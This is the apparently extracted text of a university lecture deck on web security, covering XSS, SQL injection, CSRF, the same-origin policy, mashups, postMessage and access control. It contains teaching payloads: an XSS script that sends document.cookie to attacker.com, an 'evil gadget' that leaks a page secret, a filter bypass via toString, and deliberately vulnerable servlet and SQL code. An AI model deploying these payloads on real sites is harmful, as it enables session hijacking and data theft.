Web Programming and Security Lecture 2 Tamara Rezk

Web Programming and Security

Lecture 2

Tamara Rezk

Security problems

Confidentiality violation

Integrity violation

Availability violation

Attacks, summary

• Phishing attacks (eg MySpace, 2006)

Attacks, summary

• Phishing attacks (eg MySpace, 2006)• Session integrity violation (eg Dansie shopping cart, 2006)

Attacks, summary

• Phishing attacks (eg MySpace, 2006)• Session integrity attacks (eg Dansie shopping cart, 2006)• Cross site request forgery attacks (eg Gmail, 2007)

Prevention

• Server side:– add a secret that the attacker cannot guess– re-authenticate for critical operations

• User side:– logging off one site before using others

Attacks, summary

• Phishing attacks (eg MySpace, 2006)• Session integrity attacks (eg Dansie shopping cart, 2006)• Cross site request forgery attacks (eg Gmail, 2007)• Navigation policy based attacks (eg Guninski/Citibank, 1999)

Attacks, classification?

• Phishing attacks (eg MySpace, 2006)• Session integrity attacks (eg Dansie shopping cart, 2006)• Cross site request forgery attacks (eg Gmail, 2007)• Navigation policy based attacks (eg Guninski/Citibank, 1999)

Lessons Learned

Do not trust the client on:

• Maintaining integrity of sessions state

• Running client code

• Providing valid input

Lessons Learned

Do not trust the client on:

Providing valid inputpublic class Greeting extends HttpServlet{

public void doGet{HttpServletRequest req, HttpServletResponse res)

throws ServletException, IOException{

res.setContentType(“text/html”);

PrinterWriter out = res.getWriter();

String name = req.getParameter(“name”);

out.println(“<HTML>\n<BODY>\n”);

out.printl(“Greeting from “+ name + “\n”);

out.println(“</BODY>\n</HTML>\n”);

} }

Lessons Learned

Do not trust the client

http://host/Greeting?name=<script> …</script>

Security in Web Applications

Main source of vulnerabilities

From Cenzic Web Security Trends Report Q1-Q2-2010

• Cross-site scripting

• Information leakage

• SQL Injection

Multitier nature cause problems

12

Code injection

• Data-tier code injection (SQL)

• Client-tier code injection (Javascript)

• Server-tier code injection

SQL Injection

Query = "SELECT score FROM Student where name = ‘" + input

14

SQL Code Injection Attack, Microsoft 2008

CardSystems out of business, 2005 (SQL Code injection attack)

263000numbers stolen!

s (i1, … , in) c

s server program

i1, … , in untrusted input (provided by client)

c client code: HTML document with Javascript nodes

Dynamic Code Generation

let’s see a guestbook example

Attack to the guestbook

<script> alert(“attack!”);</script>

Embedding Javascript

<body> ... <script type="text/javascript" src=“myCode.js" />

<script type="text/javascript"> //<![CDATA[ alert("Page is loading"); //]]> </script>

<p onclick="alert('I told you not to click on me!');"> Please do not click on this text.</p> ...</body>

External Javascript File

Inline Code

Event Handler

Let’s see some other ways to inject code

Code Injection, other example

• Untrusted client input:

<script>window.location = “http://attacker.com?cookie=” + document.cookie; </script>

• Goal: inject the code to a benign user;

• Consequence: – Cookie stolen by attacker.com;– Possible sensitive private information;

Code Injection & XSS - Example

DatabaseGuestbook serverBenign user

Malicious user Attacker.com

Add entry:<script>window.location = “http://attacker.com?cookie=” + document.cookie; </script>

<script>window.location = “http://attacker.com?cookie=” + document.cookie; </script>

Get all entries

<script>window.location = “http://attacker.com?cookie=” + document.cookie; </script>

Secret cookies

Existing Server-side Prevention

Escaping FilteringEscaping Filtering

Vulnerable code

Patchedcode

TaintAnalysis

TaintAnalysis

String Analysis

String Analysis

Instruction Randomization

Instruction Randomization

Programmer Attention

Required!!

Randomizedcode

WebSSARI, Huang et al. [2004]Pixy, Jovanovic et al. [2006]Xie and Aiken [2006]…

Mimamide [2005]Balzarotti [2008]Wasermann et al. [2008]…

Example:preg_replace

("script", "",input)

“<scrscriptipt>” “<script>”

Release

……

23

Boyd et al. [2004]

HTML parser and browser quirks

• Standard HTML Parser– Obtain target syntax tree– No ill-formed result produced

• Various way of triggering JS engine(BEEP [Jim et al. 2007]– Event listener: (<DIV> :onclick "alert(msg)")– Hyperlink: (<A> :href "javascript:alert(msg)")– Dynamic code evaluation: eval, document.write

• Solution: turning off all these features in Hop– Advantage of multitier language

NOT identified by syntax difference

24

Code Injection Attack vectors

Web 2.0 Applications

27

2004: AJAX (Asynchronous Javascript and XML) becomes popular,

social sites emerge

Technologies: Web Browser, Web Server,HTTP , HTMLCGI: Common Gateway InterfaceAJAX : Javascript, CSS, XML, DOM, XMLHttpRequest

request a service

partial reloading of the webpage (iframe)

XMLHttpRequest object for asynchronous communication

Mashups: HousingMaps, 2005

Web Mashup

• Web application (client side):

• Integrating third-party gadget;

• Integrator partially sharing information to gadget;

• Example: Housingmap.com

Google Maps Gadget Integrator’sHousing Data

Great way to use your data!

29

Le Monde is a mashup

Code of Le Monde

<iframe src="http://www.youtube.com/embed/W8WP2SjsZw4?rel=0" width="520" height="294"frameborder="0"></iframe>

ALL OR NOTHING TRUST MODEL IN THE BROWSER

The Same Origin Policy

Programming Model – Dilemma

• Full sharing (JS Env.)• Running as integrator• Gadget trusted

• Full isolation (by SOP)• Running as gadget• Limited sharing

– Frame identifier– PostMessage

Using <script> tag Using <iframe> frame

Google Maps Gadget Integrator’sHousing Data

Google Maps Gadget Integrator’sHousing Data

X

33

The same origin policy (SOP)

• The <iframe> tag: what about Javascript behaviour?

browser

integrator’s code

<iframe src= http://b.com/gadget.js >

…</iframe>

HEAP

global object

global object

• The <script> tag permits to treat code as code from the same origin

The same origin policy (SOP)

integrator’s code

<script src=http://b.com/gadget.js>

browser

servera.com

serverb.com

The same origin policy (SOP)

• The <script> tag: what about Javascript behaviour?

browser

integrator’s code

<script src=http://b.com/gadget.js

>

The same origin policy (SOP)

An evil gadget

integrator.html<script src = “http://attacker.com/gadget.js”> </script><div id=secret>42</div></h1>

gadget.js<script>secret=document.getElementById("secret").innerHTML;setTimeout('delayer()', 5000)delayer = function(){window.location="EvilSite.php?secret="+secret;}</script>

Important JavaScript detail:

o.f is treated as o["f"]

Javascript

Thanks Shriram Krishnamurthi for this slide

lookup =function(o, fd) {

if (fd === "XHR") {return "unsafe!"; }

else {return o[fd]; } }

40

If fd is not a string, JavaScript invokes the .toString method to convert the value to a string

Is this function safe?

badObj ={toString:

function () {return "XHR"}}

lookup(window, badObj) window[badObj] window[{toString: …}] Window[{toS…: …}.toS… ()] window[(function () …) ()] window["XHR"]

…in fact,lookup

isunsafe!

41

More evals: e.g., setTimeout:

42

function f() { alert('hello'); }

setTimeout(f, 1000);

var s = "alert('hello') ";

setTimeout(s, 1000);

Any JavaScript string!

Let’s try some more code with setTimeout

<script>s="alert('Lets talk about Javascript!')";setTimeout(s, 100)</script>

<script>function fac(x) { if (x <= 1) { return 1; } return x*fac(x-1);}r = fac(3);s = "alert("+r+")"setTimeout(s, 100)</script>

What happens now?

<script src=attacker.js></script></head><body><script>function fac(x) { if (x <= 1) { return 1; } return x*fac(x-1);}r = fac(4);s = "alert("+r+")"setTimeout(s, 100)</script>

Anything Else?

47

• Wrap DOM nodes and callbacks• Don’t hand references to DOM nodes to the wrong functions• Avoid other conditionally unsafe calls• Be aware of implicit method calls in JavaScript’s semantics• Simulate private fields (JavaScript provides none)• Disallow arbitrary traversal of the object graph• Avoid leaking the global object

Make sure all invariants hold over 50+ entry points

Thank you Shrirma Krishnamurthi for all the recommendations!Check AdSafety

The same origin policy (SOP)

• The <iframe> tag: what about Javascript behaviour?

browser

integrator’s code

<iframe src= http://b.com/gadget.js >

…</iframe>

HEAP

global object

global object

Frame Communication

Fragment Identifier Messaging

• Send information by navigating a frame– http://gadget.com/#hello

• Navigating to fragment doesn’t reload frame– No network traffic, but frame can read its fragment

• Not a secure channel– Confidentiality– Integrity– Authentication

An attack to the Elysee?

\

http://www.elysee.fr/president/accueil.1.html?id=1327062581707&msg=Sotp%20S.O.P.A%20:)%20%E2%99%AB%E2%99%AB

http://www.elysee.fr/president/accueil.1.html?id=1327077505069&msg=Anonymous

http://www.elysee.fr/president/accueil.1.html?id=1327077699951&msg=We%20Are%20Legion!

An attack to the Elysee?

\

http://www.elysee.fr/president/accueil.1.html?id=1327062581707&msg=Sotp%20S.O.P.A%20:)%20%E2%99%AB%E2%99%AB

http://www.elysee.fr/president/accueil.1.html?id=1327077505069&msg=Anonymous

http://www.elysee.fr/president/accueil.1.html?id=1327077699951&msg=We%20Are%20Legion!

Let’s see a video

HTML 5

• Cross-origin client side communications

• Postmessage channel between frames

• Child policy

postMessage

• New API for inter-frame communication

• Supported in latest betas of many browsers

• Not a secure channel– Confidentiality– Integrity– Authentication

Reply Attack

Fix: Improve the API (Standford)

• Let the sending specify the recipient– frame[0].postMessage(“Hello”, “http://gadget.com”)– Can omit argument if confidentiality not required

• Adoption– Firefox 3– Internet Explorer 8– Safari 3.1

see Securing Frame Communication in Browsers

Security considerations postmessage

• Do not configure target origin to “*”

• Sensitive data can be leaked to unknown widgets

• Always check for sender’s origin

• Always validate data before use

• Do not consume data directly with eval() or innerHTML

Basic definitions of securityConfidential information is stored in, or communicated through “objects” protected by access rights, typically for reading, writing, and executing.

• Confidentiality : to prevent unauthorized disclosure of data we should implement:– access control– secure information flow – adequate cryptography– secure protocols

(to name a few)

Access Control

“Subjects” = programs (threads) or users, with security clearances (read/write/execute).

“Objects” = where information is stored. For instance memory locations, files, entries in a database, services, communication channels … with access rights.

Access control = the operations performed by the “subjects” over the “objects” are checked to have the appropriate clearance.

Access Control (for integrity)

A simple example in hop: A Guest Book Application

Objects = “services”

Subjects = “users calling the services” (authentication)

Access Policy = “which user can call which service”

Services Users

addentry anonymous

addentry, delete-all-entries admin

Access Control (for confidentiality)

A simple example in hop: A Broker Application

Objects = “services” showStockInfo

Subjects = “users calling the services” (authentication)

Access Policy = “No user should learn anything about stocks of other users” (each user can see only his/her confidential information on stocks)

Access control

• In Hop: wizard.hop

AUTHENTICATION PROTOCOLS

Http authentication is not really secure!!

Let’s play attacker again on an example with

“Tamper Data” and a Base64 Decoder to obtain

the password of the admin user.

SSL/TLS AUTHENTICATION

INFORMATION FLOW IN THE PROGRAM

Broker Application

(define (isUser t a) (string=? t (car a)))

(define-service (show-all-entry) … (map show-entry (filter (lambda (a) (isUser username a )) broker-private-information)))

(define-service (broker) (<HTML> (<BODY>… (<BUTTON> :onclick ~(with-hop ($show-all-entry) …)

"Share holder login“)…)))

Broker Application

(define (isUser1 t a) (string-contains t (car a)))

(define-service (show-all-entry) … (map show-entry (filter (lambda (a) (isUser1 username a )) broker-private-information)))

(define-service (broker) (<HTML> (<BODY>… (<BUTTON> :onclick ~(with-hop ($show-all-entry) …)

"Share holder login“)…)))

Availability security problems

• A service or resource is made unvailable

Availability security problems

• A service or resource is made unvailable

Common attack: DOS or Distributed DOS (DDOS)

Availability security problems

• A service or resource is made unvailable

Common attack: DOS or Distributed DOS (DDOS)

How to prevent it?

Availability security problems

Attacks, summary

• Phishing attacks (eg MySpace, 2006)• Session integrity attacks (eg Dansie shopping cart, 2006)• Cross site request forgery attacks (eg Gmail, 2007)• Navigation policy based attacks (eg Guninski/Citibank, 1999)• Code injection attacks (eg Microsoft, 2008)• XSS attacks • Mashup based attacks• http authentication attacks• DOS attacks (Captchas)

Context – Multi-tier Language

• Unified Language• Code split to different

tiers• Example:

– LINKS [Cooper et al. 2005]

– Swift [Chong et al. 2007]

– Ur [Chlipala 2010]

– HOP [Serrano et al. 2006]

• This course focus: HOP

73

Multi-tier compilerMulti-tier compiler

Hop compilation

74

ServerBytecode

ServerBytecode

ServerBytecode

ServerBytecode

HTML

CSS

JS

Client code

compiler

Client code

compiler

HTTP

Invoke

Access URLs

Server code

compiler

Server code

compiler

Generate

Code InjectionPrevention

Code InjectionPrevention

MashicCompilerMashicCompiler

URL

URL

URL

URL